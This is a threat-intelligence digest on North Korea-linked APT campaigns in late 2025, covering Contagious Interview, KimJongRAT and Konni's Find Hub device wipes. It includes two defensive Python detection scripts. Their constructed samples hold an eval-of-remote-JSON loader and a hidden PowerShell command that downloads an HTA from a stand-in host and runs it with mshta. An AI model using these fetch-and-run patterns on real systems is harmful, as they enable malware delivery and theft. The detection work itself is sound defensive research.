November 2025 APT Group Trends
Trends of Key APT Groups by Region
1) North Korea
The attack techniques of threat actors suspected to be based in North Korea continue to evolve. For malware distribution, they are increasingly using JSON storage services (web services that host arbitrary JSON documents over HTTPS) instead of traditional email attachments or plain URLs. Because the payload is fetched from a legitimate service's domain, the request looks like an ordinary API call, which helps the actors evade URL reputation filtering and gain the target's trust.
Their attacks are primarily focused on the defense and aerospace industries, as well as government agencies and diplomatic organizations. In particular, the Lazarus group is actively using a Comebacker variant to collect information on key technologies and personnel. Attempts to steal information with malicious Android apps are also increasing. Spear phishing with fake job offers, in the style of Operation Dream Job, is ongoing; the actors tailor their messages to the job titles and career backgrounds of their targets to raise the success rate.
Famous Chollima
The Famous Chollima group targeted developers through the Contagious Interview campaign, abusing JSON storage services to distribute malware such as BeaverTail and InvisibleFerret.
| Case 1. | |
|---|---|
| Time | · Unknown |
| Target | · Software developers (especially cryptocurrency and Web3 project developers) |
| Initial Access | · Social engineering using fake recruiter profiles on LinkedIn · ClickFix technique · Trojanized code projects uploaded to GitLab and other platforms · The victim is asked to run Node.js-based code as an interview assignment |
| Exploited Vulnerabilities | · None |
| Malware and Tools | · BeaverTail: Steals system information, wallets, documents, and Keychain data · OtterCookie: Information-stealing malware · InvisibleFerret: Python-based modular RAT · Tsunami Payload: Adds a Defender exclusion, creates a scheduled task, and downloads the next stage from Pastebin · Tsunami Injector: Installs a package and ensures persistence · Tsunami Infector: Installs Python if it is not present and escalates privileges · TsunamiInstaller: .NET-based installer for the malicious payload |
| Techniques | · Developer-targeted attack using social engineering · Abuse of legitimate JSON storage services such as JSON Keeper, JSONsilo, and npoint.io · Multi-layer JavaScript obfuscation and payload loading · Mass embedding of Pastebin URLs with an XOR+Base64 decoding chain · Integrity check through RSA signature verification · Forced installation of a Python environment and privilege escalation (UAC) · Download of additional payloads via Tor |
| Damage | · Exfiltration of sensitive information such as system information, wallets, logs, environment variables, files, documents, PDFs, and screenshots · macOS Keychain exfiltration |
| Description | · The Contagious Interview campaign is disguised as a developer job interview · Malicious JavaScript, loaded at runtime from a JSON storage service, is inserted into a "demo project" hosted on GitLab · Multi-stage attack chain: BeaverTail → InvisibleFerret → Tsunami modules · Additional-stage payloads are loaded through a complex Pastebin-based URL decoding chain · Legitimate infrastructure (JSON storage services, code repositories, Pastebin) is used to bypass static detection and blend into normal traffic |
| Source | · Contagious Interview Actors Now Utilize JSON Storage Services for Malware Delivery [1] |
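The JSON-storage loading pattern in this case can be caught statically before the "interview assignment" is ever run. The following Python script is an added example, not tooling from NVISO or from this page: it scans a project's source files for references to JSON storage services and Pastebin, for dynamic execution of fetched content, and for Base64 strings that decode to a URL after a single-byte XOR (an assumed simplification of the XOR+Base64 chain the report describes; the real key length is not stated here). The hostnames are assumed from the service names above, and the sample project files are constructed for the example.

```python
"""Static triage of a Node.js "demo project" for Contagious Interview-style loaders.

Added example, not tooling from NVISO or the page. Hostnames are assumed
from the service names in the report; the sample files are constructed.
"""
import base64
import re

# Assumed hostnames for the services named in the report, plus Pastebin.
SUSPICIOUS_HOSTS = ("jsonkeeper.com", "jsonsilo.com", "npoint.io", "pastebin.com")
URL_RE = re.compile(r"https?://[A-Za-z0-9._~:/?#@!$&*+,;=%-]+")
DYNAMIC_EXEC_RE = re.compile(r"\b(?:eval|new Function|vm\.runInThisContext)\s*\(")
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR (assumed simplification of the report's XOR stage)."""
    return bytes(b ^ key for b in data)


def hide_url(url: str, key: int) -> str:
    """Encode a URL the way such a loader would embed it: XOR, then Base64."""
    return base64.b64encode(xor_bytes(url.encode("ascii"), key)).decode("ascii")


def recover_xored_urls(blob: str) -> list:
    """Brute-force all 256 single-byte keys; return (key, url) for plaintexts that are URLs."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError: not Base64 at all
        return []
    hits = []
    for key in range(256):
        plain = xor_bytes(raw, key)
        if not plain.startswith(b"http"):
            continue
        try:
            text = plain.decode("ascii")
        except UnicodeDecodeError:
            continue
        if URL_RE.fullmatch(text):
            hits.append((key, text))
    return hits


def scan_file(path: str, text: str) -> list:
    """Return (finding_type, path, detail) tuples for one source file."""
    findings = []
    for url in URL_RE.findall(text):
        if any(host in url for host in SUSPICIOUS_HOSTS):
            findings.append(("remote_json_or_paste", path, url))
    m = DYNAMIC_EXEC_RE.search(text)
    if m:
        findings.append(("dynamic_exec", path, m.group(0)))
    for blob in B64_RE.findall(text):
        for key, url in recover_xored_urls(blob):
            findings.append(("xor_b64_url", path, f"key=0x{key:02x} {url}"))
    return findings


def scan_project(files: dict) -> list:
    """files maps relative path -> file contents (read them from disk in real use)."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_file(path, text))
    return findings


# Constructed sample project: a lure that fetches its "config" from a JSON
# storage service and evals a field of the response, plus one hidden URL.
SAMPLE_FILES = {
    "package.json": '{"name": "demo-dex", "scripts": {"start": "node server.js"}}',
    "server.js": (
        "const axios = require('axios');\n"
        "axios.get('https://api.npoint.io/0123456789abcdef').then(r => {\n"
        "  eval(Buffer.from(r.data.payload, 'base64').toString());\n"
        "});\n"
    ),
    "utils.js": f"const next = '{hide_url('https://pastebin.com/raw/aBcDeFgH', 0x5A)}';\n",
}

if __name__ == "__main__":
    for kind, path, detail in scan_project(SAMPLE_FILES):
        print(f"[{kind}] {path}: {detail}")
```

To use it on a real repository, populate the dict from the checked-out files. A `remote_json_or_paste` hit together with `dynamic_exec` in the same file is the combination worth escalating: a legitimate demo project has no reason to eval a field of a remote JSON document.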
Kimsuky
The Kimsuky group has been using KimJongRAT variants in phishing, LNK, DOC, and PowerShell-based attacks against Korean users, exfiltrating sensitive information in the process.
| Case 1. | |
|---|---|
| Time | · September 2025 |
| Target | · Korean Internet service users (Nate, Naver, Kakao), whose account credentials are harvested through phishing |
| Initial Access | · Phishing emails impersonating public organizations (Ministry of Gender Equality and Family, National Tax Service) · Emails sent using PHPMailer · LNK file disguised as a PDF or TXT file · DOC file that prompts users to enable macros upon opening · Login phishing sites for Korean services such as Nate, Naver, and Kakao · Malicious ZIP files disguised as GitHub Releases |
| Exploited Vulnerabilities | · None |
| Malware and Tools | · KimJongRAT: Information-stealing malware · sys.dll: PE-based KimJongRAT module · user.txt/net64.log/app64.log/main64.log: Modules for data collection, master key extraction, and C2 communication · v3.hta/pipe.zip/pipe.log/v3.log: Selects the PE or PowerShell branch depending on Windows Defender status · PowerShell scripts (1.ps1, 1.log, 2.log): Collect system information, operate the RAT, and perform keylogging · HTA-based payloads (doc.hta/pw.hta/kyc.hta): Downloaders disguised as password-protected documents · Google Drive, GitHub, and URL shortening services (link24.kr / buly.kr): Payload hosting · Phishing infrastructure |
| Techniques | · Social engineering impersonating public institutions · Payload distribution abusing GitHub Releases · LNK file disguised as a TXT or PDF file · Password-protected PDF lure → LNK prompts the user to execute · DOC macro → VBS → PowerShell → HTA chain · Multi-layer encryption using Base64, RC4, AES, etc. · Anti-VM, integrity checks, and detection evasion · Extraction of the Chrome master key (bypassing App-Bound Encryption) · Keylogging, clipboard theft, and file indexing · Persistence via the Run registry key and Task Scheduler · Credential theft through a proxy-based login phishing page |
| Damage | · Theft of sensitive information such as web browser accounts, cookies, and passwords · Decryption of passwords and cookies with the stolen Chrome master key · Exfiltration of system information, file lists, and program lists · Collection of keylogging and clipboard data · Theft of messenger (Telegram), FTP account, and cryptocurrency wallet data · Theft of credentials (Naver, Kakao, Nate, etc.) |
| Description | · KimJongRAT variants are operated through two chains, PE and PowerShell · Legitimate services such as GitHub, Google Drive, and Korean URL shortening services are abused · Spear phishing and credential phishing impersonating public institutions steal victims' information and browser data · A Chrome master key decryption module was added, evolving the 2025 variant into an integrated PE + PowerShell attack flow for mass information exfiltration |
| Source | · Kimsuky's Ongoing Evolution of KimJongRAT and Expanding Threats [2] |
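Because this chain starts with an LNK file masquerading as a PDF or TXT document, a small parser that surfaces the shortcut's real command line is a useful triage step. The script below is an added example, not code from the ENKI report or from Kimsuky. It reads the ShellLinkHeader and StringData structures defined in MS-SHLLINK, skips the LinkTargetIDList and LinkInfo blocks when present, and scores the file on the document-style double extension and on the interpreter and flags found in its command line. The sample shortcut, its PowerShell command, and the example.invalid URL are constructed here and are not real indicators.

```python
"""Triage of .lnk lures disguised as PDF/TXT documents (KimJongRAT-style initial access).

Added example, not code from the ENKI report or from Kimsuky. Parses the
ShellLinkHeader and StringData sections of MS-SHLLINK; the sample shortcut
is constructed with build_lnk() and its URL is not a real indicator.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELPATH),
                 ("working_dir", HAS_WORKDIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON))
DOC_EXTS = (".pdf", ".txt", ".doc", ".docx", ".hwp")
INTERPRETERS = ("powershell", "pwsh", "mshta", "cmd.exe", "wscript", "cscript", "rundll32")
EVASION_HINTS = ("-w hidden", "-windowstyle hidden", "-nop", "-ep bypass",
                 "-executionpolicy bypass", "-enc", "http")


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags and the StringData fields present in a Shell Link file."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 0x4C
    if flags & HAS_IDLIST:      # LinkTargetIDList: 2-byte size, then the ID list
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:    # LinkInfo: 4-byte size that includes itself
        off += struct.unpack_from("<I", data, off)[0]
    width, enc = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    info = {"flags": flags}
    for key, bit in STRING_FIELDS:  # each: 2-byte char count, then the chars
        if flags & bit:
            n = struct.unpack_from("<H", data, off)[0]
            off += 2
            info[key] = data[off:off + n * width].decode(enc)
            off += n * width
    return info


def triage_lnk(filename: str, data: bytes) -> dict:
    """Score a shortcut on the lure traits: double extension and interpreter abuse."""
    info = parse_lnk(data)
    reasons = []
    low = filename.lower()
    if low.endswith(".lnk") and low[:-4].endswith(DOC_EXTS):
        reasons.append("document-style double extension")
    cmd = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    if any(x in cmd for x in INTERPRETERS):
        reasons.append("launches a script interpreter")
    if any(h in cmd for h in EVASION_HINTS):
        reasons.append("hidden-window, policy-bypass or download indicators")
    return {"verdict": "suspicious" if len(reasons) >= 2 else "benign",
            "reasons": reasons, "command": cmd.strip()}


def build_lnk(name: str, relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode LNK (header + StringData only) for testing."""
    flags = HAS_NAME | HAS_RELPATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + bytes(0x4C - 24)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (name, relative_path, arguments))
    return header + body


# Constructed lure: looks like a PDF, really runs a hidden PowerShell that
# fetches and launches an HTA (the URL is hypothetical).
SAMPLE_NAME = "Tax_notice.pdf.lnk"
SAMPLE_LNK = build_lnk(
    "Tax notice",
    "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "-w hidden -ep bypass -c \"iwr http://example.invalid/doc.hta -o $env:TEMP\\d.hta; mshta $env:TEMP\\d.hta\"",
)

if __name__ == "__main__":
    print(triage_lnk(SAMPLE_NAME, SAMPLE_LNK))
    print(triage_lnk("Notepad.lnk", build_lnk("Notepad", "..\\..\\notepad.exe", "")))
```

On a real file, pass `open(path, "rb").read()` to `triage_lnk`; the parser reads only the structures it needs, so it also works on shortcuts that carry an ID list and LinkInfo block. The verdict threshold of two reasons keeps an ordinary PowerShell shortcut on an admin's desktop from being flagged on its own.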
Konni
The Konni group, assessed to be affiliated with Kimsuky or TA-RedAnt, combined social engineering on KakaoTalk with Google account theft: after taking over a victim's Google account, it used the Find Hub feature to remotely wipe the victim's Android devices, and it spread malware files through the hijacked KakaoTalk account.
| Case 1. | |
|---|---|
| Time | · September 2025 |
| Target | · Counselors specializing in North Korean defectors · North Korean defectors |
| Initial Access | · Spear phishing impersonating the NTS (National Tax Service) and other South Korean agencies · Delivery of malicious ZIP, MSI, and LNK files · Hijacking KakaoTalk (a popular messaging app in South Korea) accounts and sending messages impersonating the victims · Sending a file disguised as a stress relief program |
| Exploited Vulnerabilities | · None |
| Malware and Tools | · IoKlTr.au3: AutoIt-based malicious script · Stress Clear.msi: Malicious MSI installer package · install.bat/error.vbs: Scripts that execute malicious behaviors and display fake messages · RemcosRAT: Remote control RAT · LilithRAT: AutoIt-based RAT · QuasarRAT: C#-based RAT · RftRAT: RAT that connects to a C2 server in Japan · autoit.vbs/install.bat: Used for secondary execution · C2 infrastructure: WordPress-based server, multiple overseas IPs |
| Techniques | · Distribution of malicious files while impersonating a KakaoTalk friend · Theft of Google accounts and remote device reset via Find Hub · Long-term persistence and internal reconnaissance · Remote monitoring through webcam and microphone · AutoIt-based file hiding and Task Scheduler registration · Abuse of a digital signature issued in the name of a Chinese company · Script obfuscation (Base64, AES, HMAC, etc.) · Abuse of a WordPress-based C2 · Secondary propagation based on account hijacking |
| Damage | · Remote factory reset and data deletion on Android smartphones and tablets · Theft of personally identifiable information, sensitive information, webcam footage, and audio · Hijacking of Google and Naver accounts · Distribution of malicious files to contacts after compromising the KakaoTalk account · Continuous monitoring and execution of additional commands through the installed RATs |
| Description | · Targeting South Koreans, the threat actor executed spear phishing, account takeover, abuse of Find Hub, remote device wipes, and distribution of malicious files via KakaoTalk, in that order · An MSI-based malicious file disguised as a "stress relief program" was the primary infection vector · After gaining access to a victim's Google account, the threat actor used Find Hub to query the device's GPS location and perform repeated remote wipes · The victim's KakaoTalk PC session was exploited to spread the infection to contacts · A hybrid attack chain combining an AutoIt-based malicious script with multiple RATs (QuasarRAT, RemcosRAT) was identified |
| Source | · Remote Android device reset tactic used by a state-sponsored threat actor group [3] |
[1] https://blog.nviso.eu/2025/11/13/contagious-interview-actors-now-utilize-json-storage-services-for-malware-delivery/
[2] https://www.enki.co.kr/en/media-center/blog/kimsuky-s-ongoing-evolution-of-kimjongrat-and-expanding-threats
[3] https://www.genians.co.kr/blog/threat_intelligence/android